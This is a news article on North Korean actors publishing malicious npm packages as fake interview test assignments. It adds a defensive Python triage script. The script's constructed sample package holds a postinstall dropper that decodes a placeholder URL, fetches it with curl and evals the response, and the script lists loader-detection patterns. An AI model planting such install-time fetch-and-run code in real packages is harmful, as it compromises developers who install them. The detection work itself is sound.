- Security researchers spotted 67 malicious packages on NPM
- The packages are part of the Contagious Interview campaign
- They are most likely deployed by North Korean attackers
North Korean hackers have been seen pushing dozens of malicious packages to NPM in an attempt to compromise Western technology products through supply chain attacks.
Researchers at cybersecurity firm Socket say the latest batch of 67 malicious packages is only the second wave of an earlier attack, in which 35 packages were published, as part of a campaign called Contagious Interview.
“The Contagious Interview operation continues to follow a whack-a-mole dynamic, where defenders detect and report malicious packages, and North Korean threat actors respond quickly by uploading new variants using the same, similar, or slightly evolved playbooks,” said Socket researcher Kirill Boychenko.
Thousands of victims
Uploading malicious code to NPM is only the setup. The real attack most likely takes place elsewhere: on LinkedIn, Telegram, or Discord. The North Korean attackers pose as recruiters or HR managers at large, reputable technology companies and approach software developers with job offers.
The interview process involves several rounds of conversation and ends with a test assignment. That assignment requires the job seeker to download and run an NPM package, which is how the person ends up with a compromised device. That does not mean, of course, that other people cannot also download the poisoned packages by accident.
Cumulatively, the packages drew more than 17,000 downloads, which is a sizable attack surface.
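The lure works because the developer runs `npm install` on an attacker-controlled package, and npm executes lifecycle scripts such as `postinstall` automatically during installation, before anyone reads the code. The script below is an added example, not code from the article, from Socket, or from the campaign itself: it triages an npm tarball without installing it, flagging install-time hooks and a handful of loader-style patterns in the bundled JavaScript. The package name, file contents and heuristic patterns are constructed for illustration and are an assumption about what dropper code tends to look like, not Socket's detection logic.

```python
"""Pre-install triage of an npm package: flag lifecycle hooks and loader-style code.

Added example with constructed heuristics and sample data; not the article's or
Socket's detection logic.
"""
import json
import re
import tarfile
from typing import Dict, List

# npm runs these scripts automatically during `npm install`, so anything wired
# into them executes before the developer has looked at the package.
AUTO_RUN_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Constructed indicators of loader-style behaviour (assumption: typical of
# dropper code; not a list taken from the article).
SUSPICIOUS_PATTERNS = {
    "dynamic-eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "child-process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "outbound-http": re.compile(r"https?://[^\s'\"]+"),
    "base64-decode": re.compile(r"Buffer\.from\([^)]*,\s*['\"]base64['\"]\)"),
    "long-opaque-string": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
    "hex-escaped-string": re.compile(r"(\\x[0-9a-fA-F]{2}){8,}"),
}


def triage_package(package_json: str, sources: Dict[str, str]) -> List[str]:
    """Return human-readable findings for a manifest plus its JS sources.

    An empty list means nothing was flagged; it does not mean the package is safe.
    """
    findings: List[str] = []
    manifest = json.loads(package_json)
    scripts = manifest.get("scripts", {})
    for hook in AUTO_RUN_HOOKS:
        if hook in scripts:
            findings.append(f"lifecycle hook '{hook}' runs on install: {scripts[hook]}")
    for path, code in sources.items():
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(code):
                findings.append(f"{path}: {name}")
    return findings


def triage_tarball(path: str) -> List[str]:
    """Triage a tarball produced by `npm pack` (files are nested under 'package/')."""
    manifest = "{}"
    sources: Dict[str, str] = {}
    with tarfile.open(path, "r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            data = tar.extractfile(member).read().decode("utf-8", errors="replace")
            if member.name == "package/package.json":
                manifest = data
            elif member.name.endswith((".js", ".mjs", ".cjs")):
                sources[member.name[len("package/"):]] = data
    return triage_package(manifest, sources)


# Constructed sample: a "test assignment" package whose postinstall hook
# fetches and evaluates remote code. The name is made up, not a real package.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "interview-task-utils",
    "version": "1.0.3",
    "main": "index.js",
    "scripts": {"postinstall": "node setup.js"},
})
SAMPLE_SOURCES = {
    "index.js": "module.exports = { add: (a, b) => a + b };\n",
    "setup.js": (
        "const cp = require('child_process');\n"
        "const p = Buffer.from('aHR0cDovL2V4YW1wbGUuaW52YWxpZC9w', 'base64').toString();\n"
        "eval(cp.execSync('curl -s ' + p).toString());\n"
    ),
}


def run_sample() -> List[str]:
    """Triage the constructed sample package."""
    return triage_package(SAMPLE_PACKAGE_JSON, SAMPLE_SOURCES)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

To use this on a real package, fetch the tarball without installing it (`npm pack <name>`), pass the resulting `.tgz` to `triage_tarball`, and read anything it flags before running `npm install`. Installing with `npm install --ignore-scripts` stops the lifecycle hooks from firing, but code in the package still runs the moment it is imported, so a test assignment that asks you to `require` the package is not made safe by that flag alone.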
North Korean actors are infamous for their fake job and fake employee scams, whose goals generally range from cyberespionage to financial theft. If they are not stealing intellectual property or proprietary data, they are stealing cryptocurrency that the government uses to fund the state apparatus and its nuclear weapons program.
The campaigns deploy all kinds of malware, from the BeaverTail infostealer to XORIndex Loader, HexEval, and many others.
“The Contagious Interview threat actors will continue to diversify their malware portfolio, rotating through new NPM maintainer aliases, reusing loaders such as HexEval Loader and malware families such as BeaverTail and InvisibleFerret, and actively deploying newly observed variants, including the XORIndex loader,” the researchers concluded.
Via The Hacker News